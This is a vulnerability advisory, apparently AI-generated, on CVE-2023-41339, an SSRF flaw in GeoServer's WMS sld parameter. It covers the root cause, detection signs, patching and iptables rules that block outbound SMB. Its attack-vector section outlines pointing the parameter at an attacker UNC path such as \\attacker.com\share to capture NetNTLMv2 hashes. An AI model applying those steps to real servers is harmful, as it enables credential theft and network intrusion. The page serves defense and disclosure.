CVE-2023-41339 Overview
CVE-2023-41339 is a Server-Side Request Forgery (SSRF) vulnerability in GeoServer, an open source software server written in Java that allows users to share and edit geospatial data. The vulnerability exists in the WMS (Web Map Service) specification implementation, which defines an sld=<url> parameter for GetMap, GetLegendGraphic, and GetFeatureInfo operations. When dynamic styling is enabled without proper URL validation checks, attackers can exploit this functionality to perform SSRF attacks.
Critical Impact
This vulnerability can be exploited to steal user NetNTLMv2 hashes, which could subsequently be relayed or cracked externally to gain unauthorized access to systems and networks.
Affected Products
- OSGeo GeoServer versions prior to 2.22.5
- OSGeo GeoServer versions prior to 2.23.2
Discovery Timeline
- 2023-10-25 - CVE CVE-2023-41339 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2023-41339
Vulnerability Analysis
This Server-Side Request Forgery vulnerability stems from the GeoServer's implementation of the WMS specification's dynamic styling feature. The sld=<url> parameter allows users to supply custom Styled Layer Descriptor (SLD) files via URL for GetMap, GetLegendGraphic, and GetFeatureInfo operations. Without proper URL validation and checks in place, this feature can be abused to make the server initiate requests to arbitrary URLs controlled by an attacker.
The vulnerability is particularly dangerous in Windows environments where attackers can craft requests to SMB shares, causing the GeoServer to authenticate using the service account's NetNTLMv2 credentials. These captured hashes can then be used in relay attacks against other systems or subjected to offline cracking attempts.
Root Cause
The root cause of this vulnerability is the lack of URL validation checks when processing user-supplied SLD URLs. The GeoServer implementation accepts and fetches resources from arbitrary URLs without verifying whether the target is an internal or sensitive endpoint. This missing input validation (CWE-918) allows attackers to abuse the server as a proxy for making requests to internal resources or external malicious servers.
Attack Vector
The attack is network-based and requires no authentication or user interaction. An attacker can exploit this vulnerability by:
- Identifying a vulnerable GeoServer instance with dynamic styling enabled
- Crafting a malicious WMS request (GetMap, GetLegendGraphic, or GetFeatureInfo) with the sld parameter pointing to an attacker-controlled URL
- When targeting Windows systems, using a UNC path (e.g., \\attacker.com\share) to capture NetNTLMv2 hashes
- Relaying or cracking the captured credentials to gain further access to the network
The vulnerability can also be used to scan internal networks, access internal services, or exfiltrate data through DNS or HTTP channels.
Detection Methods for CVE-2023-41339
Indicators of Compromise
- Unusual outbound HTTP/HTTPS requests from GeoServer to external or internal IP addresses
- WMS requests containing sld= parameters with suspicious URLs, particularly those pointing to internal networks or UNC paths
- SMB authentication attempts originating from the GeoServer host to external systems
- Unexpected DNS queries from the GeoServer for unfamiliar domains
Detection Strategies
- Monitor and log all WMS requests containing the sld parameter for anomalous URL patterns
- Implement network-level monitoring for outbound connections from GeoServer to unexpected destinations
- Review web server access logs for GetMap, GetLegendGraphic, and GetFeatureInfo requests with external URL references
- Deploy intrusion detection rules to identify SSRF attack patterns in WMS requests
Monitoring Recommendations
- Enable detailed logging for all GeoServer WMS operations
- Configure alerts for outbound SMB traffic (port 445) from web application servers
- Monitor for NetNTLMv2 authentication events that may indicate credential theft attempts
- Implement egress filtering to restrict outbound connections from the GeoServer to known, approved destinations
How to Mitigate CVE-2023-41339
Immediate Actions Required
- Upgrade GeoServer to version 2.22.5 or 2.23.2 or later immediately
- If immediate patching is not possible, disable the dynamic styling feature until the update can be applied
- Configure URL checks to restrict which external resources can be fetched by the SLD parameter
- Review GeoServer logs for any evidence of exploitation attempts
Patch Information
This vulnerability has been patched in GeoServer versions 2.22.5 and 2.23.2. Organizations should upgrade to these versions or later to remediate the vulnerability. Patches are available through the official GeoServer GitHub releases:
For detailed information about this vulnerability and the fix, refer to the GitHub Security Advisory GHSA-cqpc-x2c6-2gmf.
Workarounds
- Disable dynamic styling by removing or restricting the sld parameter functionality in GeoServer configuration
- Implement network-level controls to block outbound connections from the GeoServer to untrusted destinations
- Configure a web application firewall (WAF) to filter requests containing suspicious sld parameter values
- Use egress filtering to prevent the GeoServer from initiating connections to internal networks or external SMB shares
# Example: Block outbound SMB traffic from GeoServer using iptables
iptables -A OUTPUT -p tcp --dport 445 -m owner --uid-owner geoserver -j DROP
iptables -A OUTPUT -p udp --dport 445 -m owner --uid-owner geoserver -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
